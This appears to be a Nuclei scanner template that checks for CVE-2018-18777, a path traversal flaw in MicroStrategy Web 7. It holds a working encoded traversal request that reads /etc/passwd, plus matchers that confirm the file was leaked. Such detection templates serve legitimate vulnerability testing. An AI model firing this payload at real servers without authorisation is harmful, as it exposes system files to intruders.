id: CVE-2018-18777

info:
  name: Path traversal vulnerability in Microstrategy Web version 7
  author: 0x_Akoko
  severity: high
  reference: https://www.exploit-db.com/exploits/45755
  tags: microstrategy,lfi

requests:
  - method: GET
    path:
      - "{{BaseURL}}/WebMstr7/servlet/mstrWeb?evt=3045&src=mstrWeb.3045&subpage=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd"

    matchers-condition: and
    matchers:

      - type: regex
        regex:
          - "root:.*:0:0"

      - type: status
        status:
          - 200